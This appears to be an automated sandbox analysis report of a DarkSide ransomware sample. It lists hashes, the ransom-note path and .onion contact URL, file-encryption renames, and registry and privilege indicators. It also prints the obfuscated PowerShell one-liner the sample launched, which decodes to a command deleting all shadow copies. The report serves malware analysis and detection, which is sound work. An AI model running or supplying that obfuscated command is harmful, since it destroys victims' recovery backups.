Analysis
-
max time kernel
121s -
max time network
147s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
25-01-2022 23:29
Static task
static1
Behavioral task
behavioral1
Sample
mal.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
mal.exe
Resource
win10-en-20211208
General
-
Target
mal.exe
-
Size
512KB
-
MD5
650d18a78f30302a1e10f664a0d2cb0a
-
SHA1
c318776aefbd0156de1e6f7bba216d87e27c6341
-
SHA256
2c7d10f64dc39ea9bd6f18d9d1e1204f0c62324e8da148354d557bba17e3c615
-
SHA512
cb209a8c381e99c8adf49a2ea1caa0732da0ad5891b7b244dcf8540d677a03b7e912b4e121c25440a5bbf855a112b8c0061f0974922154c6bdf11eb176bd3c57
Malware Config
Extracted
C:\\README.82ee2099.TXT
darkside
http://darksidfqzcuhtk2.onion/GM0CG8TNZ83ZPUD15TL76BLDCG0ST24TR6NXG1J2AVXSKF8KS4KFIIN2ON5GRWD4
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 19 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
mal.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\UnregisterRestore.tiff mal.exe File renamed C:\Users\Admin\Pictures\ConfirmDebug.raw => C:\Users\Admin\Pictures\ConfirmDebug.raw.82ee2099 mal.exe File renamed C:\Users\Admin\Pictures\ConfirmSwitch.raw => C:\Users\Admin\Pictures\ConfirmSwitch.raw.82ee2099 mal.exe File opened for modification C:\Users\Admin\Pictures\CopyUndo.tiff mal.exe File renamed C:\Users\Admin\Pictures\CopyUndo.tiff => C:\Users\Admin\Pictures\CopyUndo.tiff.82ee2099 mal.exe File renamed C:\Users\Admin\Pictures\PingDismount.raw => C:\Users\Admin\Pictures\PingDismount.raw.82ee2099 mal.exe File opened for modification C:\Users\Admin\Pictures\ResumeSet.crw.82ee2099 mal.exe File renamed C:\Users\Admin\Pictures\UnregisterRestore.tiff => C:\Users\Admin\Pictures\UnregisterRestore.tiff.82ee2099 mal.exe File renamed C:\Users\Admin\Pictures\CheckpointPublish.tif => C:\Users\Admin\Pictures\CheckpointPublish.tif.82ee2099 mal.exe File opened for modification C:\Users\Admin\Pictures\ConfirmDebug.raw.82ee2099 mal.exe File opened for modification C:\Users\Admin\Pictures\ConfirmSwitch.raw.82ee2099 mal.exe File opened for modification C:\Users\Admin\Pictures\DebugTrace.tiff mal.exe File opened for modification C:\Users\Admin\Pictures\DebugTrace.tiff.82ee2099 mal.exe File opened for modification C:\Users\Admin\Pictures\CheckpointPublish.tif.82ee2099 mal.exe File renamed C:\Users\Admin\Pictures\DebugTrace.tiff => C:\Users\Admin\Pictures\DebugTrace.tiff.82ee2099 mal.exe File renamed C:\Users\Admin\Pictures\ResumeSet.crw => C:\Users\Admin\Pictures\ResumeSet.crw.82ee2099 mal.exe File opened for modification C:\Users\Admin\Pictures\CopyUndo.tiff.82ee2099 mal.exe File opened for modification C:\Users\Admin\Pictures\PingDismount.raw.82ee2099 mal.exe File opened for modification C:\Users\Admin\Pictures\UnregisterRestore.tiff.82ee2099 mal.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
mal.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\82ee2099.BMP" mal.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\82ee2099.BMP" mal.exe -
Modifies Control Panel 1 IoCs
Processes:
mal.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallpaperStyle = "10" mal.exe -
Modifies registry class 5 IoCs
Processes:
mal.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099\ = "82ee2099" mal.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon mal.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099 mal.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\82ee2099.ico" mal.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099 mal.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exemal.exepid process 2144 powershell.exe 2144 powershell.exe 2144 powershell.exe 2720 mal.exe 2720 mal.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
mal.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 2720 mal.exe Token: SeSecurityPrivilege 2720 mal.exe Token: SeTakeOwnershipPrivilege 2720 mal.exe Token: SeLoadDriverPrivilege 2720 mal.exe Token: SeSystemProfilePrivilege 2720 mal.exe Token: SeSystemtimePrivilege 2720 mal.exe Token: SeProfSingleProcessPrivilege 2720 mal.exe Token: SeIncBasePriorityPrivilege 2720 mal.exe Token: SeCreatePagefilePrivilege 2720 mal.exe Token: SeBackupPrivilege 2720 mal.exe Token: SeRestorePrivilege 2720 mal.exe Token: SeShutdownPrivilege 2720 mal.exe Token: SeDebugPrivilege 2720 mal.exe Token: SeSystemEnvironmentPrivilege 2720 mal.exe Token: SeRemoteShutdownPrivilege 2720 mal.exe Token: SeUndockPrivilege 2720 mal.exe Token: SeManageVolumePrivilege 2720 mal.exe Token: 33 2720 mal.exe Token: 34 2720 mal.exe Token: 35 2720 mal.exe Token: 36 2720 mal.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeBackupPrivilege 1800 vssvc.exe Token: SeRestorePrivilege 1800 vssvc.exe Token: SeAuditPrivilege 1800 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
mal.exedescription pid process target process PID 2720 wrote to memory of 2144 2720 mal.exe powershell.exe PID 2720 wrote to memory of 2144 2720 mal.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\mal.exe"C:\Users\Admin\AppData\Local\Temp\mal.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
c11eefc391596abf20be57025705306b
SHA1755175fa7bd43f51247f871f8acc614eb543982b
SHA256ffc70159e477fc6ffd9df2563501347fe991a7beb753700c454f1e8f6ad5ff9b
SHA5128778fa98cbe48aca42d553db4a1c5f030f8000e6fbfa3acfb7670f0010999e834a4bcc064b0f3741609928c3caf283e61f9e7674e2fb5a5c6bb292c7b4081ba5
-
memory/2144-128-0x000002F89B330000-0x000002F89B332000-memory.dmpFilesize
8KB
-
memory/2144-129-0x000002F89B333000-0x000002F89B335000-memory.dmpFilesize
8KB
-
memory/2144-130-0x000002F89C750000-0x000002F89C772000-memory.dmpFilesize
136KB
-
memory/2144-134-0x000002F89D240000-0x000002F89D2B6000-memory.dmpFilesize
472KB
-
memory/2144-147-0x000002F89B336000-0x000002F89B338000-memory.dmpFilesize
8KB
-
memory/2720-118-0x0000000000400000-0x000000000083B000-memory.dmpFilesize
4.2MB
-
memory/2720-119-0x0000000000C10000-0x0000000000C2C000-memory.dmpFilesize
112KB
-
memory/2720-120-0x0000000000030000-0x0000000000040000-memory.dmpFilesize
64KB
-
memory/2720-121-0x0000000000400000-0x000000000083B000-memory.dmpFilesize
4.2MB